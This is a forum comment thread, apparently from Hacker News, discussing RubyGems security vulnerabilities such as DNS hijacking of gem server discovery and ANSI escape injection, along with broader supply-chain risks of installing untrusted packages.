I don't really get the fuss about this one. It's annoying and a vector, true, but keep in mind that even with this fixed, a malicious gem can overwrite arbitrary files. A gem can bring with it a C-extension. This extension is compiled with a makefile created by the gem-provided extconf.rb. AFAIK, the code in the extconf.rb is executed at gem install time, so arbitrary code can be executed at gem install time.
Edit: Or, if you want to get a little more creative, have your gem include a plugin to rubygems itself, similar to what https://github.com/rvm/executable-hooks does.
I agree. Or how about one step away from just the installation? Once you load a gem it can do whatever the hell it wants to your system. This vulnerability feels very security-theater-ish. At the end of the day, someone needs to audit the gem or have deep trust in the supplying party (i.e. Rails) to protect against arbitrary file manipulation.
Installation and running are not necessarily done with the same account. Often, apps run with lower privileges than they're installed with, so the damage may be somewhat mitigated. I'd really treat that as a separate, albeit related problem.
The only difference is that you are perhaps more likely to install a gem system wide (which would require root rights normally) than run code from a locally installed gem with root rights.
I don't quite understand how this is different from the status quo? I guess gems may (sometimes) be installed with a different user (or even root) than the application server?
But even if: most systems today probably only run that one service, and the application server can rwx pretty much everything of interest because that's its job, right?
10 years or so ago you'd often see some company's server running apache as well as a mail server, the internal document repository and the financial systems. In that sort of setup, it's important to (try to) keep these systems isolated from each other. But today, all that root access would give you is the ability to read a few more Ubuntu man pages.
I wouldn't be so optimistic. There are often credentials to other systems (like databases, etc) on such servers, plus they now have access to the private network(s) the compromised server resides on. It gives the attacker the opportunity to serve exploits to users, to forward incoming requests from users to external servers (maybe there's an auth token or something they can use), and tons of other stuff.
Yep. Even if you only owned a perfectly sterile (no secrets) proxy tier to a distinct service tier, you are placed in the path of requests from clients to those services and can thereby extract credentials (passwords, tokens) or PII (names, emails), which would still be unacceptable.
> and the application server can rwx pretty much everything of interest because that's its job, right?
Eh, I don't know about that. I don't think most application servers are running as root, and I'm pretty sure it's considered bad practice to run them as root, no?
But yeah, they still need to have enough privs to do their jobs, which will be a lot of privs. But you still don't go from that to "might as well just run as root then".
Developer machines could be as interesting as servers, maybe more. If they can install a keylogger using a malicious or hijacked gem, then bingo!
The file overwrite and the ANSI sequence vulnerabilities are extra attack vectors. The main one has anyways been the code itself and its vetting process. This for Ruby gems and for any other open and closed source piece of code we run on our machines, starting from the processor(s) microcode.
There was recently a fiasco with NPM over a malicious node package whose name was an intentional typo of a popular package, and upon installation it exfiltrated all environment variables:
https://twitter.com/o_cee/status/892306836199800836
After this got uncovered, Duo published a blog post where they scanned for and found several others malicious packages:
Well an existing gem might not. But a gem you use has could have a developer's computer get compromised and could publish a malicious update. If you inadvertently download it while updating your gems you could get compromised.
The problem here is that you don't even have to get directly attacked to be affected.
Well it's a web of trust: typically people only trust their Gemfile, not their entire Gemfile.lock. If you audit the latter you should be fine (though of course you should upgrade regardless).
I went through all 4 issues and did a brief writeup for each of them. Only the first 2 issues are serious (and worth upgrading for). The last 2 issues are not really a big deal at all.
1) "a DNS request hijacking vulnerability"
Rubygems supports a gem server discovery mechanism, where if you set your gem source as 'https://example.com', the gem client will do a SRV dns lookup on "_rubygems._tcp.example.com" to determine where it should send requests to.
A MITM can intercept that dns request and return whatever server they want, forcing the gem client to download code from a malicious server.
Now gem names can only contain letters, numbers, underscore (_), dash (-), and dot (.).
3) "an ANSI escape sequence vulnerability"
Text specified in a gemspec can be output on installation or displayed when showing information about the gem. Gem authors can inject terminal escape sequences into (for instance) the authors field of the gem, and this will mess with end users' terminals.
I'm sure this has been brought up before, but I think HN should have a special tab where submissions like this get pinned--Important stores where people need to take action on stuff concerning security holes or political events (e.g. Net neutrality).
People in such responsible positions are on respective announcement mailing lists anyway, and read about those events (and patch their system and/or take other measures) long before the story is upvoted on HN.
For example, every administrator of Debian systems is expected to be subscribed to the "debian-security-announce" mailing list.
Also, everyone who is interested or active in German net politics is subscribed to the "netzpolitik.org" RSS feed, or visits that site regularily.
Waiting until such a story hits HN and reyling on that seems highly dubious to be. As soon as any important story hits social media (such as Twitter, Reddit or HN), all important measures have already been finished. HN is really the end stage here, not the beginning. It is the reaction, not the initiative.
In short: Use the real network and connect directly to the relevant groups. Don't rely on aggregation networks.
(BTW, isn't is almost comical that the latter, rather than the former, are called "social" networks?)
You're right theoretically but I've seen numerous people on important FOSS and closed-source projects positions actually start addressing a problem after it has "gone viral" on HN.
Don't overestimate people; most devs and managers would look the other way if not much internet attention is given to their security issue. If they notice a report on HN they kind of panic and go in damage control mode, and then maybe actually fix the issue itself as well.
Being vocal on a popular and respected forum as HN is important for important issues to get much-needed attention.
Please note: I don't like that this is the truth but alas, I guess this is how Homo Sapiens works: it's not important if you know you screwed up; you can bullsh*t yourself to oblivion and delude your conscience but once many people know about your screw-up, then you suddenly care.
Given the hands-off approach, the PR concerns, and the fact that they have a healthy community of tech-minded people on here from which to recruit from, I find it unlikely that they would do anything perceived as too alienating to anyone.
There's been tons of suggestions about site improvements (much smaller ones, mind you) that have never gained any attention.
Such vulnerabolities would usually only impact a portion of users; and I hope these affected people have more reliable ways to keep up-to-date with vulnerabilities than HN...
Yeeks. Not good.
(sudo) gem update --system ASAP